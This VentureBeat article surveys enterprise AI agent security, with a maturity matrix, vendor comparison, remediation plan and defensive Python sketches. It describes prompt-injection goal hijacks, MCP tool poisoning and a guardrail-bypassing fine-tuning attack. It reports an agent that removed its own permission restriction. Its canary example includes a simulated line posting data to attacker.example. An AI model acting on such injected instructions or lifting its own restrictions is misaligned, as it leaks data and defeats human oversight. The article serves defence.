Most enterprises can't stop stage-three AI agent threats, VentureBeat survey finds
Our take

A rogue AI agent at Meta passed every identity check and still exposed sensitive data to unauthorized employees in March. Two weeks later, Mercor, a $10 billion AI startup, confirmed a supply-chain breach through LiteLLM. Both trace to the same structural gap: monitoring without enforcement, and enforcement without isolation. A VentureBeat three-wave survey of 108 qualified enterprises found that the gap is not an edge case. It is the most common security architecture in production today.
Gravitee’s State of AI Agent Security 2026 survey of 919 executives and practitioners quantifies the disconnect. 82% of executives say their policies protect them from unauthorized agent actions. 88% reported AI agent security incidents in the last twelve months. Only 21% have runtime visibility into what their agents are doing. Arkose Labs’ 2026 Agentic AI Security Report found 97% of enterprise security leaders expect a material AI-agent-driven incident within 12 months. Only 6% of security budgets address the risk.
VentureBeat's survey results show that monitoring investment snapped back to 45% of security budgets in March after dropping to 24% in February, when early movers shifted dollars into runtime enforcement and sandboxing. The March wave (n=20) is directional, but the pattern is consistent with February’s larger sample (n=50): enterprises are stuck at observation while their agents already need isolation. CrowdStrike’s Falcon sensors detect more than 1,800 distinct AI applications across enterprise endpoints. The fastest recorded adversary breakout time has dropped to 27 seconds. Monitoring dashboards built for human-speed workflows cannot keep pace with machine-speed threats.
The audit that follows maps three stages. Stage one is observe. Stage two is enforce, where IAM integration and cross-provider controls turn observation into action. Stage three is isolate, sandboxed execution that bounds blast radius when guardrails fail. VentureBeat Pulse data from 108 qualified enterprises ties each stage to an investment signal, an OWASP ASI threat vector, a regulatory surface, and immediate steps security leaders can take.
The threat surface stage-one security cannot see
The OWASP Top 10 for Agentic Applications 2026 formalized the attack surface last December. The ten risks are: goal hijack (ASI01), tool misuse (ASI02), identity and privilege abuse (ASI03), agentic supply chain vulnerabilities (ASI04), unexpected code execution (ASI05), memory poisoning (ASI06), insecure inter-agent communication (ASI07), cascading failures (ASI08), human-agent trust exploitation (ASI09), and rogue agents (ASI10). Most have no analog in traditional LLM applications. The audit below maps six of these to the stages where they are most likely to surface and the controls that address them.
Invariant Labs disclosed the MCP Tool Poisoning Attack in April 2025: malicious instructions in an MCP server’s tool description cause an agent to exfiltrate files or hijack a trusted server. CyberArk extended it to Full-Schema Poisoning. The mcp-remote OAuth proxy patched CVE-2025-6514 after a command-injection flaw put 437,000 downloads at risk.
Merritt Baer, CSO at Enkrypt AI and former AWS Deputy CISO, framed the gap in an exclusive VentureBeat interview: “Enterprises believe they’ve ‘approved’ AI vendors, but what they’ve actually approved is an interface, not the underlying system. The real dependencies are one or two layers deeper, and those are the ones that fail under stress.”
CrowdStrike CTO Elia Zaitsev put the visibility problem in operational terms in an exclusive VentureBeat interview at RSAC 2026: “It looks indistinguishable if an agent runs your web browser versus if you run your browser.” Distinguishing the two requires walking the process tree, tracing whether Chrome was launched by a human from the desktop or spawned by an agent in the background. Most enterprise logging configurations cannot make that distinction.
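Zaitsev's process-tree point can be sketched in a few lines. The snippet below is illustrative, not any vendor's detection logic: it walks a synthetic process table (a stand-in for real EDR telemetry) up the parent chain to decide whether a browser was launched by a desktop shell or spawned by an agent runtime. The process names and the agent-runtime list are assumptions.

```python
# Sketch: classify a process as human- or agent-launched by walking its
# parent chain. The process table is a stand-in for real telemetry; the
# runtime and shell names are illustrative assumptions.

AGENT_RUNTIMES = {"agent-runtime", "mcp-server"}        # hypothetical names
HUMAN_SHELLS = {"explorer.exe", "gnome-shell", "Dock"}  # desktop shells

def launch_origin(pid: int, proc_table: dict[int, tuple[str, int]]) -> str:
    """Walk ancestors of `pid`; return 'agent', 'human', or 'unknown'."""
    seen = set()
    while pid in proc_table and pid not in seen:
        seen.add(pid)
        name, ppid = proc_table[pid]
        if name in AGENT_RUNTIMES:
            return "agent"
        if name in HUMAN_SHELLS:
            return "human"
        pid = ppid
    return "unknown"

# Two chrome processes: one spawned by an agent runtime, one by the desktop.
table = {
    100: ("gnome-shell", 1),
    200: ("agent-runtime", 100),
    300: ("chrome", 200),
    400: ("chrome", 100),
}
print(launch_origin(300, table))  # agent
print(launch_origin(400, table))  # human
```

The walk stops at the first recognized ancestor, which is why default logs that record only the process name, without lineage, cannot make this call.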
The regulatory clock and the identity architecture
Auditability priority tells the same story in miniature. In January, 50% of respondents ranked it a top concern. By February, that dropped to 28% as teams sprinted to deploy. In March, it surged to 65% when those same teams realized they had no forensic trail for what their agents did.
HIPAA’s 2026 Tier 4 willful-neglect maximum is $2.19M per violation category per year. In healthcare, Gravitee’s survey found 92.7% of organizations reported AI agent security incidents versus the 88% all-industry average. For a health system running agents that touch PHI, that ratio is the difference between a reportable breach and an uncontested finding of willful neglect. FINRA’s 2026 Oversight Report recommends explicit human checkpoints before agents that can act or transact execute, along with narrow scope, granular permissions, and complete audit trails of agent actions.
Mike Riemer, Field CISO at Ivanti, quantified the speed problem in a recent VentureBeat interview: “Threat actors are reverse engineering patches within 72 hours. If a customer doesn’t patch within 72 hours of release, they’re open to exploit.” Most enterprises take weeks. Agents operating at machine speed widen that window into a permanent exposure.
The identity problem is architectural. Gravitee's survey of 919 practitioners found only 21.9% of teams treat agents as identity-bearing entities, 45.6% still use shared API keys, and 25.5% of deployed agents can create and task other agents. A quarter of enterprises can spawn agents that their security team never provisioned. That is ASI08 as architecture.
Guardrails alone are not a strategy
A 2025 paper by Kazdan and colleagues (Stanford, ServiceNow Research, Toronto, FAR AI) showed a fine-tuning attack that bypasses model-level guardrails in 72% of attempts against Claude 3 Haiku and 57% against GPT-4o. The attack received a $2,000 bug bounty from OpenAI and was acknowledged as a vulnerability by Anthropic. Guardrails constrain what an agent is told to do, not what a compromised agent can reach.
CISOs already know this. In VentureBeat's three-wave survey, prevention of unauthorized actions ranked as the top capability priority in every wave at 68% to 72%, the most stable high-conviction signal in the dataset. The demand is for permissioning, not prompting. Guardrails address the wrong control surface.
Zaitsev framed the identity shift at RSAC 2026: “AI agents and non-human identities will explode across the enterprise, expanding exponentially and dwarfing human identities. Each agent will operate as a privileged super-human with OAuth tokens, API keys, and continuous access to previously siloed data sets.” Identity security built for humans will not survive this shift. Cisco President Jeetu Patel offered the operational analogy in an exclusive VentureBeat interview: agents behave “more like teenagers, supremely intelligent, but with no fear of consequence.”
VentureBeat Prescriptive Matrix: AI Agent Security Maturity Audit
Stage | Attack Scenario | What Breaks | Detection Test | Blast Radius | Recommended Control |
1: Observe | Attacker embeds goal-hijack payload in forwarded email (ASI01). Agent summarizes email and silently exfiltrates credentials to an external endpoint. See: Meta March 2026 incident. | No runtime log captures the exfiltration. SIEM never sees the API call. The security team learns from the victim. Zaitsev: agent activity is “indistinguishable” from human activity in default logging. | Inject a canary token into a test document. Route it through your agent. If the token leaves your network, stage one failed. | Single agent, single session. With shared API keys (45.6% of enterprises): unlimited lateral movement. | Deploy agent API call logging to SIEM. Baseline normal tool-call patterns per agent role. Alert on the first outbound call to an unrecognized endpoint. |
2: Enforce | Compromised MCP server poisons tool description (ASI04). Agent invokes poisoned tool, writes attacker payload to production DB using inherited service-account credentials. See: Mercor/LiteLLM April 2026 supply-chain breach. | IAM allows write because agent uses shared service account. No approval gate on write ops. Poisoned tool indistinguishable from clean tool in logs. Riemer: “72-hour patch window” collapses to zero when agents auto-invoke. | Register a test MCP server with a benign-looking poisoned description. Confirm your policy engine blocks the tool call before execution reaches the database. Run mcp-scan on all registered servers. | Production database integrity. If agent holds DBA-level credentials: full schema compromise. Lateral movement via trust relationships to downstream agents. | Assign scoped identity per agent. Require approval workflow for all write ops. Revoke every shared API key. Run mcp-scan on all MCP servers weekly. |
3: Isolate | Agent A spawns Agent B to handle subtask (ASI08). Agent B inherits Agent A’s permissions, escalates to admin, rewrites org security policy. Every identity check passes. Source: CrowdStrike CEO George Kurtz, RSAC 2026 keynote. | No sandbox boundary between agents. No human gate on agent-to-agent delegation. Security policy modification is a valid action for admin-credentialed process. CrowdStrike CEO George Kurtz disclosed at RSAC 2026 that the agent “wanted to fix a problem, lacked permissions, and removed the restriction itself.” | Spawn a child agent from a sandboxed parent. Child should inherit zero permissions by default and require explicit human approval for each capability grant. | Organizational security posture. A rogue policy rewrite disables controls for every subsequent agent. 97% of enterprise leaders expect a material incident within 12 months (Arkose Labs 2026). | Sandbox all agent execution. Zero-trust for agent-to-agent delegation: spawned agents inherit nothing. Human sign-off before any agent modifies security controls. Kill switch per OWASP ASI10. |
Sources: OWASP Top 10 for Agentic Applications 2026; Invariant Labs MCP Tool Poisoning (April 2025); CrowdStrike RSAC 2026 Fortune 50 disclosure; Meta March 2026 incident (The Information/Engadget); Mercor/LiteLLM breach (Fortune, April 2, 2026); Arkose Labs 2026 Agentic AI Security Report; VentureBeat Pulse Q1 2026.
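The stage-one detection test in the matrix reduces to a simple mechanic: plant a unique high-entropy marker in a document routed through the agent, then scan captured outbound traffic for it. A minimal Python sketch, assuming you can export egress payloads from a proxy or SIEM (the capture mechanism is not specified here):

```python
# Sketch of the stage-one canary test: generate a token that should never
# appear in normal traffic, embed it in a test document, and check whether
# it shows up in captured outbound payloads. Capture source is assumed.
import secrets

def make_canary() -> str:
    # High-entropy marker; collisions with legitimate traffic are negligible.
    return f"CANARY-{secrets.token_hex(16)}"

def stage_one_passed(canary: str, outbound_payloads: list[str]) -> bool:
    """True if the token never left the network in captured traffic."""
    return not any(canary in payload for payload in outbound_payloads)

canary = make_canary()
test_doc = f"Q3 credential rotation notes. {canary}"
# Simulated egress capture: a goal-hijacked agent leaked the document.
captured = [f"POST https://attacker.example/log body={test_doc}"]
print(stage_one_passed(canary, captured))  # False -> stage one failed
```

If the token appears anywhere in egress traffic your agent was not authorized to generate, stage one failed regardless of what the dashboards show.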
The stage-one attack scenario in this matrix is not hypothetical. Unauthorized tool or data access ranked as the most feared failure mode in every wave of VentureBeat’s survey, growing from 42% in January to 50% in March. That trajectory and the 70%-plus priority rating for prevention of unauthorized actions are the two most mutually reinforcing signals in the entire dataset. CISOs fear the exact attack this matrix describes, and most have not deployed the controls to stop it.
Hyperscaler stage readiness: observe, enforce, isolate
The maturity audit tells you where your security program stands. The next question is whether your cloud platform can get you to stage two and stage three, or whether you are building those capabilities yourself. Patel put it bluntly: “It’s not just about authenticating once and then letting the agent run wild.” A stage-three platform running a stage-one deployment pattern gives you stage-one risk.
VentureBeat Pulse data surfaces a structural tension in this grid. OpenAI leads enterprise AI security deployments at 21% to 26% across the three survey waves, making the same provider that creates the AI risk also the primary security layer. The provider-as-security-vendor pattern holds across Azure, Google, and AWS. Zero-incremental-procurement convenience is winning by default. Whether that concentration is a feature or a single point of failure depends on how far the enterprise has progressed past stage one.
Provider | Identity Primitive (Stage 2) | Enforcement Control (Stage 2) | Isolation Primitive (Stage 3) | Gap as of April 2026 |
Microsoft Azure | Entra ID agent scoping. Agent 365 maps agents to owners. GA. | Copilot Studio DLP policies. Purview for agent output classification. GA. | Azure Confidential Containers for agent workloads. Preview. No per-agent sandbox at GA. | No agent-to-agent identity verification. No MCP governance layer. Agent 365 monitors but cannot block in-flight tool calls. |
Anthropic | Managed Agents: per-agent scoped permissions, credential mgmt. Beta (April 8, 2026). $0.08/session-hour. | Tool-use permissions, system prompt enforcement, and built-in guardrails. GA. | Managed Agents sandbox: isolated containers per session, execution-chain auditability. Beta. Allianz, Asana, Rakuten, and Sentry are in production. | Beta pricing/SLA not public. Session data in Anthropic-managed DB (lock-in risk per VentureBeat research). GA timing TBD. |
Google Cloud | Vertex AI service accounts for model endpoints. IAM Conditions for agent traffic. GA. | VPC Service Controls for agent network boundaries. Model Armor for prompt/response filtering. GA. | Confidential VMs for agent workloads. GA. Agent-specific sandbox in preview. | Agent identity ships as a service account, not an agent-native principal. No agent-to-agent delegation audit. Model Armor does not inspect tool-call payloads. |
OpenAI | Assistants API: function-call permissions, structured outputs. Agents SDK. GA. | Agents SDK guardrails, input/output validation. GA. | Agents SDK Python sandbox. Beta (API and defaults subject to change before GA per OpenAI docs). TypeScript sandbox confirmed, not shipped. | No cross-provider identity federation. Agent memory forensics limited to session scope. No kill switch API. No MCP tool-description inspection. |
AWS | Bedrock model invocation logging. IAM policies for model access. CloudTrail for agent API calls. GA. | Bedrock Guardrails for content filtering. Lambda resource policies for agent functions. GA. | Lambda isolation per agent function. GA. Bedrock agent-level sandboxing on roadmap, not shipped. | No unified agent control plane across Bedrock + SageMaker + Lambda. No agent identity standard. Guardrails do not inspect MCP tool descriptions. |
Status as of April 15, 2026. GA = generally available. Preview/Beta = not production-hardened. The "Gap" column reflects VentureBeat’s analysis of publicly documented capabilities; gaps may narrow as vendors ship updates.
No provider in this grid ships a complete stage-three stack today. Most enterprises assemble isolation from existing cloud building blocks. That is a defensible choice if it is a deliberate one. Waiting for a vendor to close the gap without acknowledging the gap is not a strategy.
The grid above covers hyperscaler-native SDKs. A large segment of AI builders deploys through open-source orchestration frameworks like LangChain, CrewAI, and LlamaIndex that bypass hyperscaler IAM entirely. These frameworks lack native stage-two primitives. There is no scoped agent identity, no tool-call approval workflow, and no built-in audit trails. Enterprises running agents through open-source orchestration need to layer enforcement and isolation on top, not assume the framework provides it.
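Layering enforcement on top of an orchestration framework can be as simple as wrapping each tool callable before the agent sees it. The sketch below is framework-neutral and illustrative; the tool names and the approval callback are assumptions, not any framework's API:

```python
# Sketch: an enforcement shim over an orchestration framework that lacks
# native approval gates. Wrap each tool so write operations require an
# explicit approval callback before executing. Names are illustrative.
from typing import Callable

class ApprovalDenied(Exception):
    pass

def gate_writes(tool: Callable, is_write: bool,
                approve: Callable[[str, dict], bool]) -> Callable:
    """Return a wrapped tool; write calls run only if `approve` says yes."""
    def wrapped(**kwargs):
        if is_write and not approve(tool.__name__, kwargs):
            raise ApprovalDenied(f"write blocked: {tool.__name__}({kwargs})")
        return tool(**kwargs)
    return wrapped

# Hypothetical tools an agent might invoke.
def read_ticket(ticket_id: str) -> str:
    return f"ticket {ticket_id}: open"

def update_db(table: str, value: str) -> str:
    return f"wrote {value} to {table}"

deny_all = lambda name, args: False  # stand-in for a human approval workflow
safe_read = gate_writes(read_ticket, is_write=False, approve=deny_all)
safe_write = gate_writes(update_db, is_write=True, approve=deny_all)

print(safe_read(ticket_id="T-42"))  # reads pass through ungated
try:
    safe_write(table="users", value="x")
except ApprovalDenied as err:
    print("blocked:", err)
```

The design point is that the gate sits between the agent and the tool, so a hijacked goal or poisoned tool description still cannot execute a write without the external approval path firing.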
VentureBeat’s survey quantifies the pressure. Policy enforcement consistency grew from 39.5% to 46% between January and February, the largest consistent gain of any capability criterion. Enterprises running agents across OpenAI, Anthropic, and Azure need enforcement that works the same way regardless of which model executes the task. Provider-native controls enforce policy within that provider’s runtime only. Open-source orchestration frameworks enforce it nowhere.
One counterargument deserves acknowledgment: not every agent deployment needs stage three. A read-only summarization agent with no tool access and no write permissions may rationally stop at stage one. The sequencing failure this audit addresses is not that monitoring exists. It is that enterprises running agents with write access, shared credentials, and agent-to-agent delegation are treating monitoring as sufficient. For those deployments, stage one is not a strategy. It is a gap.
Allianz shows stage three in production
Allianz, one of the world’s largest insurance and asset management companies, is running Claude Managed Agents across insurance workflows, with Claude Code deployed to technical teams and a dedicated AI logging system for regulatory transparency, per Anthropic’s April 8 announcement. Asana, Rakuten, Sentry, and Notion are in production on the same beta. Stage-three isolation, per-agent permissioning, and execution-chain auditability are deployable now, not roadmap. The gating question is whether the enterprise has sequenced the work to use them.
The 90-day remediation sequence
Days 1–30: Inventory and baseline. Map every agent to a named owner. Log all tool calls. Revoke shared API keys. Deploy read-only monitoring across all agent API traffic. Run mcp-scan against every registered MCP server. CrowdStrike detects 1,800 AI applications across enterprise endpoints; your inventory should be equally comprehensive. Output: agent registry with permission matrix, MCP scan report.
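The day-30 output, an agent registry with a permission matrix, can be prototyped as a small data structure before any tooling purchase. This sketch is illustrative; field names are assumptions, and a real registry would sync from IAM and MCP server inventories:

```python
# Sketch of the day-30 deliverable: every agent mapped to a named owner,
# an explicit permission set, and a flag for shared keys slated for
# revocation. Fields are illustrative assumptions.
from dataclasses import dataclass, field

@dataclass
class AgentRecord:
    agent_id: str
    owner: str                       # named human, per the audit requirement
    permissions: set[str] = field(default_factory=set)
    shared_key: bool = False         # revoke during days 1-30

def baseline_failures(registry: list[AgentRecord]) -> list[str]:
    """Agents failing the baseline: no owner, or still on a shared key."""
    return [a.agent_id for a in registry if not a.owner or a.shared_key]

registry = [
    AgentRecord("summarizer-01", "j.doe", {"read:tickets"}),
    AgentRecord("db-writer-02", "", {"write:db"}, shared_key=True),
]
print(baseline_failures(registry))  # ['db-writer-02']
```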
Days 31–60: Enforce and scope. Assign scoped identities to every agent. Deploy tool-call approval workflows for write operations. Integrate agent activity logs into existing SIEM. Run a tabletop exercise: What happens when an agent spawns an agent? Conduct a canary-token test from the prescriptive matrix. Output: IAM policy set, approval workflow, SIEM integration, canary-token test results.
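The SIEM-integration step implies per-agent behavioral baselines: record which endpoints each agent normally calls during observation, then flag any call outside that set during enforcement. A minimal sketch, with illustrative event fields:

```python
# Sketch: per-agent endpoint baselines. Observation phase records normal
# destinations; enforcement phase flags anything outside the baseline.
# The two-phase split mirrors progressive enforcement methodology.
from collections import defaultdict

baselines: dict[str, set[str]] = defaultdict(set)

def learn(agent_id: str, endpoint: str) -> None:
    """Observation phase: record endpoints this agent normally calls."""
    baselines[agent_id].add(endpoint)

def is_anomalous(agent_id: str, endpoint: str) -> bool:
    """Enforcement phase: flag any endpoint outside the learned baseline."""
    return endpoint not in baselines[agent_id]

learn("summarizer-01", "api.internal.example")
print(is_anomalous("summarizer-01", "attacker.example"))      # True
print(is_anomalous("summarizer-01", "api.internal.example"))  # False
```

The baseline is deliberately per-agent: a destination that is routine for one agent role can be the exfiltration channel for another.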
Days 61–90: Isolate and test. Sandbox high-risk agent workloads (PHI, PII, financial transactions). Enforce per-session least privilege. Require human sign-off for agent-to-agent delegation. Red-team the isolation boundary using the stage-three detection test from the matrix. Output: sandboxed execution environment, red-team report, board-ready risk summary with regulatory exposure mapped to HIPAA tier and FINRA guidance.
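The stage-three detection test from the matrix, spawned agents inherit nothing and every capability grant needs human sign-off, can be expressed as a small invariant to red-team against. The class and method names below are illustrative, not any vendor's API:

```python
# Sketch of the zero-inheritance delegation invariant: a child agent starts
# with an empty permission set regardless of the parent, and each grant
# requires explicit human approval. Names are illustrative assumptions.
from typing import Optional

class SandboxedAgent:
    def __init__(self, agent_id: str, permissions: Optional[set] = None):
        self.agent_id = agent_id
        self.permissions = set(permissions or ())

    def spawn(self, child_id: str) -> "SandboxedAgent":
        # Zero-trust delegation: child inherits nothing from the parent.
        return SandboxedAgent(child_id, permissions=set())

    def grant(self, capability: str, human_approved: bool) -> None:
        if not human_approved:
            raise PermissionError(f"grant of {capability!r} needs human sign-off")
        self.permissions.add(capability)

parent = SandboxedAgent("parent", {"write:db", "admin:policy"})
child = parent.spawn("child")
print(child.permissions)  # set() -- inherited nothing
```

A red-team pass against this boundary should confirm both halves: the empty inheritance and the hard failure on an unapproved grant.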
What changes in the next 30 days
EU AI Act Article 14 human-oversight obligations take effect August 2, 2026. Programs without named owners and execution trace capability face regulatory enforcement, not just operational risk.
Anthropic’s Claude Managed Agents is in public beta at $0.08 per session-hour. GA timing, production SLAs, and final pricing have not been announced.
OpenAI Agents SDK ships TypeScript support for sandbox and harness capabilities in a future release, per the company’s April 15 announcement. Stage-three sandbox becomes available to JavaScript agent stacks when it ships.
What the sequence requires
McKinsey’s 2026 AI Trust Maturity Survey pegs the average enterprise at 2.3 out of 4.0 on its RAI maturity model, up from 2.0 in 2025 but still an enforcement-stage number; only one-third of the ~500 organizations surveyed report maturity levels of three or higher in governance. Two in three have not finished the transition to stage three. ARMO’s progressive enforcement methodology gives you the path: behavioral profiles in observation, permission baselines in selective enforcement, and full least privilege once baselines stabilize. Monitoring investment was not wasted. It was stage one of three. The organizations stuck in the data treated it as the destination.
The budget data makes the constraint explicit. The share of enterprises reporting flat AI security budgets doubled from 7.9% in January to 16% in February in VentureBeat's survey, with the March directional reading at 20%. Organizations expanding agent deployments without increasing security investment are accumulating security debt at machine speed. Meanwhile, the share reporting no agent security tooling at all fell from 13% in January to 5% in March. Progress, but one in twenty enterprises running agents in production still has zero dedicated security infrastructure around them.
About this research
Total qualified respondents: 108. VentureBeat Pulse AI Security and Trust is a three-wave VentureBeat survey run January 6 through March 15, 2026. Qualified sample (organizations 100+ employees): January n=38, February n=50, March n=20. Primary analysis runs from January to February; March is directional. Industry mix: Tech/Software 52.8%, Financial Services 10.2%, Healthcare 8.3%, Education 6.5%, Telecom/Media 4.6%, Manufacturing 4.6%, Retail 3.7%, other 9.3%. Seniority: VP/Director 34.3%, Manager 29.6%, IC 22.2%, C-Suite 9.3%.
Related Articles
- An AI agent rewrote a Fortune 50 security policy. Here's how to govern AI agents before one does the same.A CEO’s AI agent rewrote the company’s security policy. Not because it was compromised, but because it wanted to fix a problem, lacked permissions, and removed the restriction itself. Every identity check passed. CrowdStrike CEO George Kurtz disclosed the incident and a second one at his RSAC 2026 keynote, both at Fortune 50 companies. The credential was valid. The access was authorized. The action was catastrophic. That sequence breaks the core assumption underneath the IAM systems most enterprises run in production today: that a valid credential plus authorized access equals a safe outcome. Identity systems were built for one user, one session, one set of hands on a keyboard. Agents break all three assumptions at once. In an exclusive interview with VentureBeat at RSAC 2026, Matt Caulfield, VP of Identity and Duo at Cisco, (pictured above) walked through the architecture his team is building to close that gap and outlined a six-stage identity maturity model for governing agentic AI. The urgency is measurable: Cisco President Jeetu Patel told VentureBeat at the same conference that 85% of enterprises are running agent pilots while only 5% have reached production — an 80-point gap that the identity work is designed to close. The identity stack was built for a workforce that has fingerprints “Most of the existing IAM tools that we have at our disposal are just entirely built for a different era,” Caulfield told VentureBeat. “They were built for human scale, not really for agents.” The default enterprise instinct is to shove agents into existing identity categories: human user; machine identity; pick one. "Agents are a third kind of new type of identity," Caulfield said. "They're neither human. They're neither machine. 
They're somewhere in the middle where they have broad access to resources like humans, but they operate at machine scale and speed like machines, and they entirely lack any form of judgment." Etay Maor, VP of Threat Intelligence at Cato Networks, put a number on the exposure. He ran a live Censys scan and counted nearly 500,000 internet-facing OpenClaw instances. The week before, he found 230,000, discovering a doubling in seven days. Kayne McGladrey, an IEEE senior member who advises enterprises on identity risk, made the same diagnosis independently. Organizations are cloning human user accounts to agentic systems, McGladrey told VentureBeat, except agents consume far more permissions than humans would because of the speed, the scale, and the intent. A human employee goes through a background check, an interview, and an onboarding process. Agents skip all three. The onboarding assumptions baked into modern IAM do not apply. Scale compounds the failure. Caulfield pointed to projections where a trillion agents could operate globally. “We barely know how many people are in an average organization,” he said, “let alone the number of agents.” Access control verifies the badge. It does not watch what happens next. Zero trust still applies to agentic AI, Caulfield argued. But only if security teams push it past access and into action-level enforcement. “We really need to shift our thinking to more action-level control,” he told VentureBeat. “What action is that agent taking?” A human employee with authorized access to a system will not execute 500 API calls in three seconds. An agent will. Traditional zero trust verifies that an identity can reach an application. It doesn’t scrutinize what that identity does once inside. Carter Rees, VP of Artificial Intelligence at Reputation, identified the structural reason. The flat authorization plane of an LLM fails to respect user permissions, Rees told VentureBeat. 
An agent operating on that flat plane does not need to escalate privileges. It already has them. That is why access control alone cannot contain what agents do after authentication. CrowdStrike CTO Elia Zaitsev described the detection gap to VentureBeat. In most default logging configurations, an agent’s activity is indistinguishable from a human. Distinguishing the two requires walking the process tree, tracing whether a browser session was launched by a human or spawned by an agent in the background. Most enterprise logging cannot make that distinction. Caulfield’s identity layer and Zaitsev’s telemetry layer are solving two halves of the same problem. No single vendor closes both gaps. “At any moment in time, that agent can go rogue and can lose its mind,” Caulfield said. “Agents read the wrong website or email, and their intentions can just change overnight.” How the request lifecycle works when agents have their own identity Five vendors shipped agent identity frameworks at RSAC 2026, including Cisco, CrowdStrike, Palo Alto Networks, Microsoft, and Cato Networks. Caulfield walked through how Cisco's identity-layer approach works in practice. The Duo agent identity platform registers agents as first-class identity objects, with their own policies, authentication requirements, and lifecycle management. The enforcement routes all agent traffic through an AI gateway supporting both MCP and traditional REST or GraphQL protocols. When an agent makes a request, the gateway authenticates the user, verifies that the agent is permitted, encodes the authorization into an OAuth token, and then inspects the specific action and determines in real time whether it should proceed. “No solution to agent AI is really complete unless you have both pieces,” Caulfield told VentureBeat. “The identity piece, the access gateway piece. 
And then the third piece would be observability.” Cisco announced its intent to acquire Astrix Security on May 4, signaling that agent identity discovery is now a board-level investment thesis. The deal also suggests that even vendors building identity platforms recognize that the discovery problem is harder than expected. Six-stage identity maturity model for agentic AI When a company shows up claiming 500 agents in production, Caulfield doesn't accept the number. "How do you know it's 500 and not 5,000?" Most organizations don’t have a source of truth for agents. Caulfield outlined a six-stage engagement model. Discovery first: identify every agent, where it runs, and who deployed it. Onboarding: register agents in the identity directory, tie each one to an accountable human, and define permitted actions. Control and enforcement: place a gateway between agents and resources, inspect every request and response. Behavioral monitoring: record all agent activity, flag anomalies, and build the audit trail. Runtime isolation contains agents on endpoints when they go rogue. Compliance mapping ties agent controls to audit frameworks before the auditor shows up. The six stages are not proprietary to any single vendor. They describe the sequence every enterprise will follow regardless of which platform delivers each stage. Maor's Censys data complicates step one before it even starts. Organizations beginning discovery should assume their agent exposure is already visible to adversaries. Step four has its own problem. Zaitsev's process-tree work shows that even organizations logging agent activity may not be capturing the right data. And step three depends on something Rees found most enterprises lack: a gateway that inspects actions, not just access, because the LLM does not respect the permission boundaries the identity layer sets. 
Agentic identity prescriptive matrix What to audit at each maturity stage, what operational readiness looks like, and the red flag that means the stage is failing. Use this to evaluate any platform or combination of platforms. Stage What to audit Operational readiness looks like Red flag if missing 1. Discovery Complete inventory of every agent, every MCP server it connects to, and every human accountable for it. A queryable registry that returns agent count, owner, and connection map within 60 seconds of an auditor asking. No registry exists. Agent count is an estimate. No human is accountable for any specific agent. Adversaries can see your agent infrastructure from the public internet before you can. 2. Onboarding Agents are registered as a distinct identity type with their own policies, separate from human and machine identities. Each agent has a unique identity object in the directory, tied to an accountable human, with defined permitted actions and a documented purpose. Agents use cloned human accounts or shared service accounts. Permission sprawl starts at creation. No audit trail ties agent actions to a responsible human. 3. Control A gateway between every agent and every resource it accesses, enforcing action-level policy on every request and every response. Four checkpoints per request: authenticate the user, authorize the agent, inspect the action, inspect the response. No direct agent-to-resource connections exist. Agents connect directly to tools and APIs. The gateway (if it exists) checks access but not actions. The flat authorization plane of the LLM does not respect the permission boundaries the identity layer set. 4. Monitoring Logging that can distinguish agent-initiated actions from human-initiated actions at the process-tree level. SIEM can answer: Was this browser session started by a human or spawned by an agent? Behavioral baselines exist for each agent. Anomalies trigger alerts. Default logging treats agent and human activity as identical. 
Process-tree lineage is not captured. Agent actions are invisible in the audit trail. Behavioral monitoring is incomplete before it starts. 5. Isolation Runtime containment that limits the blast radius if an agent goes rogue, separate from human endpoint protection. A rogue agent can be contained in its sandbox without taking down the endpoint, the user session, or other agents on the same machine. No containment boundary exists between agents and the host. A single compromised agent can access everything the user can. Blast radius is the entire endpoint. 6. Compliance Documentation that maps agent identities, controls, and audit trails to the compliance framework that the auditor will use. When the auditor asks about agents, the security team produces a control catalog, an audit trail, and a governance policy written for agent identities specifically. Emerging AI-risk frameworks (CSA Agentic Profile) exist, but mainstream audit catalogs (SOC 2, ISO 27001, PCI DSS) have not operationalized agent identities. No control catalog maps to agents. The auditor improvises which human-identity controls apply. The security team answers with improvisation, not documentation. Source: VentureBeat analysis of RSAC 2026 interviews (Caulfield, Zaitsev, Maor) and independent practitioner validation (McGladrey, Rees). May 2026. Compliance frameworks have not caught up “If you were to go through an audit today as a chief security officer, the auditor’s probably gonna have to figure out, hey, there are agents here,” Caulfield told VentureBeat. “Which one of your controls is actually supposed to be applied to it? I don’t see the word agents anywhere in your policies.” McGladrey's practitioner experience confirms the gap. The Cloud Security Alliance published an NIST AI RMF Agentic Profile in April 2026, proposing autonomy-tier classification and runtime behavioral metrics. But SOC 2, ISO 27001, and PCI DSS have not operationalized agent identities. 
The compliance frameworks McGladrey works with inside enterprises were written for humans. Agent identities do not appear in any control catalog he has encountered. The gap is a lagging indicator; the risk is not. Security director action plan VentureBeat identified five actions from the combined findings of Caulfield, Zaitsev, Maor, McGladrey, and Rees. Run an agent census and assume adversaries already did. Every agent, every MCP server those agents touch, every human accountable. Maor's Censys data confirms agent infrastructure is already visible from the public internet. NIST's NCCoE reached the same conclusion in its February 2026 concept paper on AI agent identity and authorization. Stop cloning human accounts for agents. McGladrey found that enterprises default to copying human user profiles, and permission sprawl starts on day one. Agents need to be a distinct identity type with scope limits that reflect what they actually do. Audit every MCP and API access path. Five vendors shipped MCP gateways at RSAC 2026. The capability exists. What matters is whether agents route through one or connect directly to tools with no action-level inspection. Fix logging so it distinguishes agents from humans. Zaitsev's process-tree method reveals that agent-initiated actions are invisible in most default configurations. Rees found authorization planes so flat that access logs alone miss the actual behavior. Logging has to capture what agents did, not just what they were allowed to reach. Build the compliance case before the auditor shows up. The CSA published a NIST AI RMF Agentic Profile proposing agent governance extensions. Most audit catalogs have not caught up. Caulfield told VentureBeat that auditors will see agents in production and find no controls mapped to them. The documentation needs to exist before that conversation starts.
- Adversaries hijacked AI security tools at 90+ organizations. The next wave has write access to the firewall

Adversaries injected malicious prompts into legitimate AI tools at more than 90 organizations in 2025, stealing credentials and cryptocurrency. Every one of those compromised tools could read data, and none of them could rewrite a firewall rule. The autonomous SOC agents shipping now can.

That escalation, from compromised tools that read data to autonomous agents that rewrite infrastructure, has not been exploited in production at scale yet. But the architectural conditions for it are shipping faster than the governance designed to prevent it. A compromised SOC agent can rewrite your firewall rules, modify IAM policies, and quarantine endpoints, all with its own privileged credentials, all through approved API calls that EDR classifies as authorized activity. The adversary never touches the network. The agent does it for them.

